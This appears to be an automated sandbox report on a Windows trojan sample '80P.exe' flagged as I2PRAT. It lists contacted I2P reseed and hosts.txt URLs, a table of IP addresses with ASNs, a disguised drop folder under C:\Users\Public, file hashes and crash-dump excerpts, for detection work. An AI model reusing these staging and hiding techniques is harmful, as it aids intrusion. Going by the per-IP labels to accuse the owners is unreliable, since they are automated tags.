                              https://www2.mk16.de/jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2559133821.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://reg.i2p/hosts.txtmain.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935350679.00000201EB8FF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://reg.i2p/hosts.txtlmain.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://reseed.i2pgit.org//p_lib.cmain.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://reseed2.i2p.net/hOmain.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://reseed.i2pgit.org/Amain.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://reseed-pl.i2pd.xyz/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://stats.i2p/cgi-bin/newhosts.txtjvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://digitalbush.com/projects/masked-input-plugin/#license)80P.exefalse
                                high
                                https://reseed-pl.i2pd.xyz/p_lib.cmain.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://127.0.0.1:8118jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000003.1898592051.0000013B45248000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000003.1898541929.0000013B45243000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://identiguy.i2p/hosts.txtjvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://reseed.diva.exchange/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                                • Avira URL Cloud: malware
                                unknown
                                https://legit-website.com/i2pseeds.su3jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://reseed.onion.im/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                                • Avira URL Cloud: safe
                                unknown
                                https://i2p.mooo.com/netDb/jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://i2pd.readthedocs.io/en/latest/user-guide/configuration/jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://reseed.stormycloud.org/kmain.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://reseed.stormycloud.org/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                                • Avira URL Cloud: safe
                                unknown
                                https://reseed2.i2p.net/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www2.mk16.de/(main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://banana.incognet.io/main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.drtrue
                                • Avira URL Cloud: safe
                                unknown
                                https://reseed.onion.im/Bmain.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://reg.i2p/hosts.txtLmain.exe, 00000014.00000002.2557908253.0000013B4567C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://rus.i2p/hosts.txtjvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://127.0.0.1:8118J?main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://i2p.ghativega.in/p/p_lib.cmain.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtmain.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  76.26.184.38
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  73.155.122.99
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  184.65.173.183
                                  unknownCanada
                                  6327SHAWCAfalse
                                  99.252.122.69
                                  unknownCanada
                                  812ROGERS-COMMUNICATIONSCAfalse
                                  46.209.176.184
                                  unknownIran (ISLAMIC Republic Of)
                                  49100IR-THR-PTEIRfalse
                                  174.119.206.85
                                  unknownCanada
                                  812ROGERS-COMMUNICATIONSCAtrue
                                  23.137.250.43
                                  unknownReserved
                                  397614GTLAKESUSfalse
                                  139.59.231.96
                                  unknownSingapore
                                  14061DIGITALOCEAN-ASNUSfalse
                                  95.31.23.9
                                  unknownRussian Federation
                                  3216SOVAM-ASRUtrue
                                  98.16.145.157
                                  unknownUnited States
                                  7029WINDSTREAMUSfalse
                                  217.156.67.239
                                  unknownRomania
                                  50884XCHANGENETROfalse
                                  88.228.207.122
                                  unknownTurkey
                                  9121TTNETTRfalse
                                  72.199.129.69
                                  unknownUnited States
                                  22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                  138.74.168.219
                                  unknownUnited States
                                  2041STNORBERTCOLLEGEUSfalse
                                  217.24.233.6
                                  unknownGermany
                                  9063SAARGATE-ASVSENETGmbHDEfalse
                                  218.156.39.195
                                  unknownKorea Republic of
                                  4766KIXS-AS-KRKoreaTelecomKRfalse
                                  185.121.12.251
                                  unknownSpain
                                  207046REDSERVICIOESfalse
                                  5.161.229.21
                                  unknownGermany
                                  24940HETZNER-ASDEfalse
                                  87.219.13.126
                                  unknownSpain
                                  12479UNI2-ASESfalse
                                  175.215.255.118
                                  unknownKorea Republic of
                                  4766KIXS-AS-KRKoreaTelecomKRtrue
                                  89.223.52.84
                                  unknownRussian Federation
                                  42668NEVALINK-ASRUtrue
                                  135.181.93.228
                                  unknownGermany
                                  24940HETZNER-ASDEfalse
                                  185.177.216.199
                                  unknownRussian Federation
                                  206738TRCLINKITfalse
                                  193.148.16.211
                                  unknownRomania
                                  9009M247GBfalse
                                  85.23.104.222
                                  unknownFinland
                                  16086DNAFIfalse
                                  45.200.148.158
                                  unknownSeychelles
                                  328608Africa-on-Cloud-ASZAfalse
                                  78.22.234.134
                                  unknownBelgium
                                  6848TELENET-ASBEfalse
                                  80.74.145.70
                                  reseed.diva.exchangeSwitzerland
                                  21069ASN-METANETRoutingpeeringissuesnocmetanetchCHtrue
                                  120.26.116.232
                                  unknownChina
                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                  86.45.126.166
                                  unknownIreland
                                  5466EIRCOMInternetHouseIEfalse
                                  173.209.166.184
                                  unknownUnited States
                                  13370LOCALTELUStrue
                                  95.158.36.98
                                  unknownUkraine
                                  35362BESTBestISPUAtrue
                                  134.16.78.198
                                  unknownUnited States
                                  385AFCONC-BLOCK1-ASUStrue
                                  184.144.18.148
                                  unknownCanada
                                  577BACOMCAfalse
                                  207.246.88.73
                                  unknownUnited States
                                  20473AS-CHOOPAUSfalse
                                  73.31.50.204
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  95.105.66.5
                                  unknownRussian Federation
                                  57128KGS-NETRUfalse
                                  73.114.39.41
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  94.177.106.53
                                  unknownRomania
                                  58022AGE-ASstrPrincipalanr138ROfalse
                                  96.245.131.50
                                  unknownUnited States
                                  701UUNETUSfalse
                                  46.139.242.51
                                  unknownHungary
                                  5483MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHUtrue
                                  83.6.222.32
                                  unknownPoland
                                  5617TPNETPLfalse
                                  91.82.213.104
                                  unknownHungary
                                  20845DIGICABLEHUfalse
                                  172.98.216.26
                                  unknownUnited States
                                  396097SAIL-INETUSfalse
                                  77.238.224.240
                                  unknownRussian Federation
                                  42429TELERU-ASRUfalse
                                  24.60.181.65
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  87.106.66.194
                                  unknownGermany
                                  8560ONEANDONE-ASBrauerstrasse48DEfalse
                                  112.16.103.31
                                  unknownChina
                                  56041CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationCfalse
                                  150.230.127.230
                                  unknownUnited States
                                  13376TOPPAN-MERRILLUSfalse
                                  193.233.193.76
                                  unknownRussian Federation
                                  2895FREE-NET-ASFREEnetEUfalse
                                  78.162.217.132
                                  unknownTurkey
                                  9121TTNETTRfalse
                                  73.27.22.30
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  136.60.17.104
                                  unknownUnited States
                                  16591GOOGLE-FIBERUSfalse
                                  159.223.194.171
                                  reseed.onion.imUnited States
                                  46118CELANESE-UStrue
                                  24.128.131.37
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  188.211.91.73
                                  unknownIran (ISLAMIC Republic Of)
                                  12880DCI-ASIRfalse
                                  68.183.196.133
                                  reseed.i2pgit.orgUnited States
                                  14061DIGITALOCEAN-ASNUStrue
                                  72.83.161.95
                                  unknownUnited States
                                  701UUNETUSfalse
                                  94.131.171.105
                                  unknownUkraine
                                  53856NJIXUSfalse
                                  46.138.247.227
                                  unknownRussian Federation
                                  25513ASN-MGTS-USPDRUtrue
                                  185.226.181.238
                                  reseed-pl.i2pd.xyzSpain
                                  197518RACKMARKTEStrue
                                  88.209.121.106
                                  unknownMonaco
                                  6758AS6758MCfalse
                                  79.119.11.221
                                  unknownRomania
                                  8708RCS-RDS73-75DrStaicoviciROtrue
                                  IP
                                  127.0.0.1
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1589221
                                  Start date and time:2025-01-11 20:25:08 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 56s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:32
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:80P.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@43/69@4/64
                                  EGA Information:
                                  • Successful, ratio: 60%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29, 172.202.163.200, 13.107.246.45, 40.126.32.138
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target 80P.exe, PID 6856 because there are no executed function
                                  • Execution Graph export aborted for target jvnu3e85o6ls9huft0apy3731vg.exe, PID 5840 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size exceeded maximum capacity and may have missing network information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  TimeTypeDescription
                                  14:26:04API Interceptor196x Sleep call for process: 80P.exe modified
                                  14:26:06API Interceptor40x Sleep call for process: powershell.exe modified
                                  14:26:57API Interceptor671x Sleep call for process: main.exe modified
                                  14:27:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  23.137.250.43DF2.exeGet hashmaliciousUnknownBrowse
                                    ET5.exeGet hashmaliciousUnknownBrowse
                                      138.74.168.219file.exeGet hashmaliciousUnknownBrowse
                                        184.65.173.183file.exeGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousUnknownBrowse
                                            139.59.231.96cZO.exeGet hashmaliciousUnknownBrowse
                                              88.228.207.122DF2.exeGet hashmaliciousUnknownBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                reseed.i2pgit.orgcZO.exeGet hashmaliciousUnknownBrowse
                                                • 68.183.196.133
                                                DF2.exeGet hashmaliciousUnknownBrowse
                                                • 68.183.196.133
                                                reseed.diva.exchangeDF2.exeGet hashmaliciousUnknownBrowse
                                                • 80.74.145.70
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 80.74.145.70
                                                reseed.onion.imcZO.exeGet hashmaliciousUnknownBrowse
                                                • 159.223.194.171
                                                reseed-pl.i2pd.xyzcZO.exeGet hashmaliciousUnknownBrowse
                                                • 185.226.181.238
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ROGERS-COMMUNICATIONSCA6.elfGet hashmaliciousUnknownBrowse
                                                • 99.242.157.220
                                                4.elfGet hashmaliciousUnknownBrowse
                                                • 72.136.85.108
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 174.116.51.150
                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 69.17.129.62
                                                sora.spc.elfGet hashmaliciousMiraiBrowse
                                                • 173.42.2.191
                                                miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                • 174.113.180.168
                                                miori.x86.elfGet hashmaliciousUnknownBrowse
                                                • 173.33.68.46
                                                arm5.elfGet hashmaliciousMiraiBrowse
                                                • 99.228.179.155
                                                spc.elfGet hashmaliciousMiraiBrowse
                                                • 99.242.209.196
                                                i486.elfGet hashmaliciousMiraiBrowse
                                                • 99.250.235.74
                                                SHAWCA5.elfGet hashmaliciousUnknownBrowse
                                                • 24.69.73.54
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 24.70.86.29
                                                3.elfGet hashmaliciousUnknownBrowse
                                                • 174.7.136.232
                                                Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 70.67.61.215
                                                sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 24.109.19.148
                                                3.elfGet hashmaliciousUnknownBrowse
                                                • 24.109.19.163
                                                miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                • 70.66.3.21
                                                Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                • 24.109.54.109
                                                Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                • 174.3.244.122
                                                momo.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 24.84.202.204
                                                COMCAST-7922USres.x86.elfGet hashmaliciousUnknownBrowse
                                                • 25.43.128.161
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 50.255.150.66
                                                3.elfGet hashmaliciousUnknownBrowse
                                                • 173.162.185.65
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 66.176.224.255
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 73.119.109.120
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 74.159.94.125
                                                frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                • 184.108.200.169
                                                frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                • 75.69.59.105
                                                frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                • 174.50.238.136
                                                frosty.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 68.62.136.139
                                                COMCAST-7922USres.x86.elfGet hashmaliciousUnknownBrowse
                                                • 25.43.128.161
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 50.255.150.66
                                                3.elfGet hashmaliciousUnknownBrowse
                                                • 173.162.185.65
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 66.176.224.255
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 73.119.109.120
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 74.159.94.125
                                                frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                • 184.108.200.169
                                                frosty.spc.elfGet hashmaliciousMiraiBrowse
                                                • 75.69.59.105
                                                frosty.x86.elfGet hashmaliciousMiraiBrowse
                                                • 174.50.238.136
                                                frosty.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 68.62.136.139
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllcZO.exeGet hashmaliciousUnknownBrowse
                                                  DF2.exeGet hashmaliciousUnknownBrowse
                                                    ET5.exeGet hashmaliciousUnknownBrowse
                                                      C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllcZO.exeGet hashmaliciousUnknownBrowse
                                                        DF2.exeGet hashmaliciousUnknownBrowse
                                                          ET5.exeGet hashmaliciousUnknownBrowse
                                                            C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllcZO.exeGet hashmaliciousUnknownBrowse
                                                              DF2.exeGet hashmaliciousUnknownBrowse
                                                                ET5.exeGet hashmaliciousUnknownBrowse
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.9803229368968392
                                                                  Encrypted:false
                                                                  SSDEEP:192:NN/om6Z/d0MALS36jN7EzuiFXZ24lO8l:nwmc/eMALXjNgzuiFXY4lO8l
                                                                  MD5:3E649E410C8339CF9A5675B9CDD7AD5A
                                                                  SHA1:BD86DB608AE3A774CD49160F2C9268AB78A597A2
                                                                  SHA-256:F3FB90364B68A67031FD5CFE1D16DBECF32F52FEAE7090F3FDA6B7529E948374
                                                                  SHA-512:A96BFACF53297579A1C01DA487BDD2277FD4CE2D6422D5E199FE7259EDC299A3021610661F0DDBC82F132F204D15314AF64324695434F74B8F4B863AA103EEF3
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer, Author: Joe Security
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.9.7.2.3.5.9.5.8.0.7.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.9.7.2.3.6.4.4.2.4.4.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.1.2.c.a.b.9.-.8.d.f.1.-.4.b.7.3.-.a.b.5.9.-.8.d.5.7.e.4.6.c.4.3.0.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.b.4.2.9.4.2.-.c.4.d.e.-.4.8.1.8.-.a.7.3.4.-.3.d.5.3.3.d.6.a.e.9.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.1.c.-.0.0.0.0.-.0.0.1.4.-.8.4.3.1.-.0.9.b.2.5.e.6.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.d.b.8.9.6.1.f.8.a.f.b.9.9.9.a.e.c.e.6.0.b.f.1.e.f.3.e.4.9.e.8.e.2.3.4.9.f.7.b.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.9.
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Sat Jan 11 19:27:16 2025, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):634514
                                                                  Entropy (8bit):1.008535629636829
                                                                  Encrypted:false
                                                                  SSDEEP:768:CwrjwUH+eSbUsd9Mg7cLs2VL8xooeKH2RvHkCjPg9xGFNOh:CwDiFXN2VLmjtH2R/r
                                                                  MD5:011524809F9BD76FAFBE6CF2C63B6DF2
                                                                  SHA1:D3C0C1F89E480A2BFBD839927E2EDE60C87B12C3
                                                                  SHA-256:3CA97B60FE5454A7B9EA0C13606E68E0908DE90152C792118C82A0D30E7929C2
                                                                  SHA-512:034C35BA6973A8A73FC1D4EF32A34D1DDE833A4F49BEFE5B333C22A554FE8FDDFF80D232D17D0F130347FE56F8B730D57C3B4A61BCFF154F94487DD5D8980B21
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp, Author: Joe Security
                                                                  Preview:MDMP..a..... .........g............$...........(...8...........` ..........h...........`.......8...........T............0...~..........\!..........H#..............................................................................eJ.......#......Lw......................T.............g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):6732
                                                                  Entropy (8bit):3.721388700352761
                                                                  Encrypted:false
